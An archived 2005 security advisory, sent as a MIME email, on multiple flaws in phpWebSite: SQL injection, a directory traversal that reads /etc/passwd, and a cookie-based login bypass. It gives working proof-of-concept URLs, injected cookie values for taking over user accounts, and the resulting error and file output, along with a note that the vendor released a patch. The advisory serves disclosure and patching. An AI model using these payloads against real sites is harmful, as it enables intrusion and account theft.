phpwebsiteSQL.txt

phpwebsiteSQL.txt: Posted Jul 7, 2005; Authored by Diabolic Crab | Site hackerscenter.com; Phpwebsite suffers from multiple SQL injection flaws and a directory traversal vulnerability. Detailed exploitation provided.; tags | exploit, sql injection; SHA-256 | 72609023a954b0715a52542825a64ed43c292f8cc141424428a1038ad580c36a; Download | Favorite | View

phpwebsiteSQL.txt

This is a multi-part message in MIME format.

------=_NextPart_000_00D1_01C58264.72EAAD10
Content-Type: text/plain;
  charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

Dcrab 's Security Advisory
http://www.dbtech.org
Deadbolt Computer Technologies

Get Dcrab's Services to audit your Web servers, scripts, networks, etc =
or even code them. Learn more at http://www.dbtech.org

Severity: High
Title: Phpwebsite has multiple serious vulnerabilities
Date: 7/07/2005

Vendor: Phpwebsite
Vendor Website: http://phpwebsite.appstate.edu
Vendor Status: Contacted and patch has been released
Summary: There are, multiple sql injection, authentication bypass and =
directory transversal vulnerabilities in Phpwebsite.


Proof of Concept Exploits:=20

www.example.com/phpwebsite/index.php?module=3D'&search_op=3Dsearch&mod=3D=
all&query=3D1&search=3DSearch=20
SQL injection

DB Error: syntax error
SELECT show_block, block_title FROM mod_search WHERE module=3D''' =
[nativecode=3D1064 ** You have an error in your SQL syntax. Check the =
manual that corresponds to your MySQL server version for the right =
syntax to use near ''''' at line 1]=20

www.example.com/phpwebsite/index.php?module=3Dsearch&search_op=3Dsearch&m=
od=3D'&query=3D1&search=3DSearch
SQL injection

DB Error: syntax error
SELECT block_title FROM mod_search WHERE module=3D''' [nativecode=3D1064 =
** You have an error in your SQL syntax. Check the manual that =
corresponds to your MySQL server version for the right syntax to use =
near ''''' at line 1]=20

www.example.com/phpwebsite/index.php?module=3Dsearch&search_op=3Dsearch&m=
od=3D../../../../../../../../etc/passwd%00&query=3D1&search=3DSearch
Directory traversal

root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/bin/bash =
daemon:x:2:2:Daemon:/sbin:/bin/bash lp:x:4:7:Printing =
daemon:/var/spool/lpd:/bin/bash mail:x:8:12:Mailer =
daemon:/var/spool/clientmqueue:/bin/false news:x:9:13:News=20

Log into a user account with remember me checked, then delete all the =
cookies beside the one with [mod_users][rememberme]
Cookie name: *an md5 hash set by the website* [mod_users][rememberme]
Value: a' or 'a' =3D 'a
You can also steal specific user accounts by setting the cookie value as =
a' or user_id =3D '5'

Solution:
The vendor's were contacted via email and responded quickly. The issue =
was corresponded to them after which a patch was released on their =
official website.=20

You can get the security patch at, =
http://phpwebsite.appstate.edu/downloads/security/phpwebsite_security_pat=
ch_20050705.2.tgz

Keep your self updated, Rss feed at: http://digitalparadox.org/rss.ah =
and at http://www.hackerscenter.com

Author:=20
These vulnerabilities have been found and released by Diabolic Crab, =
Email: dcrab[AT|NOSPAM]hackerscenter[DOT|NOSPAM]com, please feel free to =
contact me regarding these vulnerabilities. You can find me at, =
http://www.hackerscenter.com or http://www.dbtech.org/. Lookout for my =
soon to come out book on Secure coding with php.


-------------------------------------------------------------------------=
-------

Sincerely,=20
Diabolic Crab=20





------=_NextPart_000_00D1_01C58264.72EAAD10
Content-Type: text/html;
  charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD>
<META http-equiv=3DContent-Type content=3D"text/html; =
charset=3Diso-8859-1">
<META content=3D"MSHTML 6.00.2900.2668" name=3DGENERATOR>
<STYLE></STYLE>
</HEAD>
<BODY bgColor=3D#ffffff>
<DIV>
<DIV>
<DIV><FONT face=3DArial size=3D2>Dcrab 's Security Advisory<BR><A=20
href=3D"http://www.dbtech.org">http://www.dbtech.org</A><BR>Deadbolt =
Computer=20
Technologies</FONT></DIV>
<DIV>&nbsp;</DIV>
<DIV><FONT face=3DArial size=3D2>Get Dcrab's Services to audit your Web =
servers,=20
scripts, networks, etc or even code them. Learn more at <A=20
href=3D"http://www.dbtech.org">http://www.dbtech.org</A></FONT></DIV>
<DIV>&nbsp;</DIV>
<DIV><FONT face=3DArial size=3D2>Severity: High<BR>Title: Phpwebsite has =
multiple=20
serious vulnerabilities<BR>Date: 7/07/2005</FONT></DIV>
<DIV>&nbsp;</DIV>
<DIV><FONT face=3DArial size=3D2>Vendor: Phpwebsite<BR>Vendor Website: =
<A=20
href=3D"http://phpwebsite.appstate.edu">http://phpwebsite.appstate.edu</A=
><BR>Vendor=20
Status: Contacted and patch has been released</FONT></DIV>
<DIV><FONT face=3DArial size=3D2>Summary: There are, multiple sql =
injection,=20
authentication bypass and directory transversal vulnerabilities in=20
Phpwebsite.</FONT></DIV>
<DIV><FONT face=3DArial size=3D2></FONT>&nbsp;</DIV><FONT face=3DArial =
size=3D2>
<DIV><BR>Proof of Concept Exploits: </DIV>
<DIV>&nbsp;</DIV>
<DIV><A=20
href=3D"http://www.example.com/phpwebsite/index.php?module=3D'&search=
_op=3Dsearch&mod=3Dall&query=3D1&search=3DSearch">www.example=
.com/phpwebsite/index.php?module=3D'&search_op=3Dsearch&mod=3Dall=
&query=3D1&search=3DSearch</A>=20
<BR>SQL injection</DIV>
<DIV>&nbsp;</DIV>
<DIV>DB Error: syntax error<BR>SELECT show_block, block_title FROM =
mod_search=20
WHERE module=3D''' [nativecode=3D1064 ** You have an error in your SQL =
syntax. Check=20
the manual that corresponds to your MySQL server version for the right =
syntax to=20
use near ''''' at line 1] </DIV>
<DIV>&nbsp;</DIV>
<DIV><A=20
href=3D"http://www.example.com/phpwebsite/index.php?module=3Dsearch&s=
earch_op=3Dsearch&mod=3D'&query=3D1&search=3DSearch">www.exam=
ple.com/phpwebsite/index.php?module=3Dsearch&search_op=3Dsearch&m=
od=3D'&query=3D1&search=3DSearch</A><BR>SQL=20
injection</DIV>
<DIV>&nbsp;</DIV>
<DIV>DB Error: syntax error<BR>SELECT block_title FROM mod_search WHERE=20
module=3D''' [nativecode=3D1064 ** You have an error in your SQL syntax. =
Check the=20
manual that corresponds to your MySQL server version for the right =
syntax to use=20
near ''''' at line 1] </DIV>
<DIV>&nbsp;</DIV>
<DIV><A=20
href=3D"http://www.example.com/phpwebsite/index.php?module=3Dsearch&s=
earch_op=3Dsearch&mod=3D../../../../../../../../etc/passwd%00&que=
ry=3D1&search=3DSearch">www.example.com/phpwebsite/index.php?module=3D=
search&search_op=3Dsearch&mod=3D../../../../../../../../etc/passw=
d%00&query=3D1&search=3DSearch</A><BR>Directory=20
traversal</DIV>
<DIV>&nbsp;</DIV>
<DIV>root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/bin/bash=20
daemon:x:2:2:Daemon:/sbin:/bin/bash lp:x:4:7:Printing=20
daemon:/var/spool/lpd:/bin/bash mail:x:8:12:Mailer=20
daemon:/var/spool/clientmqueue:/bin/false <A=20
href=3D"news:x:9:13:News">news:x:9:13:News</A> </DIV>
<DIV>&nbsp;</DIV>
<DIV>Log into a user account with remember me checked, then delete all =
the=20
cookies beside the one with [mod_users][rememberme]<BR>Cookie name: *an =
md5 hash=20
set by the website* [mod_users][rememberme]<BR>Value: a' or 'a' =3D =
'a<BR>You can=20
also steal specific user accounts by setting the cookie value as a' or =
user_id =3D=20
'5'</DIV>
<DIV>&nbsp;</DIV>
<DIV>Solution:</DIV>
<DIV>The vendor's were contacted via email and responded quickly. The =
issue was=20
corresponded to them after which a patch was released on their official =
website.=20
</DIV>
<DIV>&nbsp;</DIV>
<DIV>You can get the security patch at, <A=20
href=3D"http://phpwebsite.appstate.edu/downloads/security/phpwebsite_secu=
rity_patch_20050705.2.tgz">http://phpwebsite.appstate.edu/downloads/secur=
ity/phpwebsite_security_patch_20050705.2.tgz</A></DIV>
<DIV>&nbsp;</DIV>
<DIV>Keep your self updated, Rss feed at: <A=20
href=3D"http://digitalparadox.org/rss.ah">http://digitalparadox.org/rss.a=
h</A> and=20
at <A =
href=3D"http://www.hackerscenter.com">http://www.hackerscenter.com</A></D=
IV>
<DIV>&nbsp;</DIV>
<DIV>Author: <BR>These vulnerabilities have been found and released by =
Diabolic=20
Crab, Email: dcrab[AT|NOSPAM]hackerscenter[DOT|NOSPAM]com, please feel =
free to=20
contact me regarding these vulnerabilities. You can find me at, <A=20
href=3D"http://www.hackerscenter.com">http://www.hackerscenter.com</A> =
or <A=20
href=3D"http://www.dbtech.org/">http://www.dbtech.org/</A>. Lookout for =
my soon to=20
come out book on Secure coding with php.<BR></FONT></DIV>
<DIV>
<HR>
<BR>Sincerely, <BR>Diabolic Crab=20
<BR><BR><BR><BR><BR></DIV></DIV></DIV></BODY></HTML>

------=_NextPart_000_00D1_01C58264.72EAAD10--

Top Authors In Last 30 Days

Red Hat 286 files
Ubuntu 65 files
Debian 25 files
Gentoo 16 files
LiquidWorm 10 files
nu11secur1ty 6 files
Milad Karimi 4 files
Google Security Research 3 files
Adam Gowdiak 3 files
kai6u 3 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,028)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,483)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,509)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,710)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,480)
UNIX (9,395)
UnixWare (187)
Windows (6,653)
Other

phpwebsiteSQL.txt

phpwebsiteSQL.txt

File Archive:

May 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

phpwebsiteSQL.txt

Share This

phpwebsiteSQL.txt

File Archive:

May 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems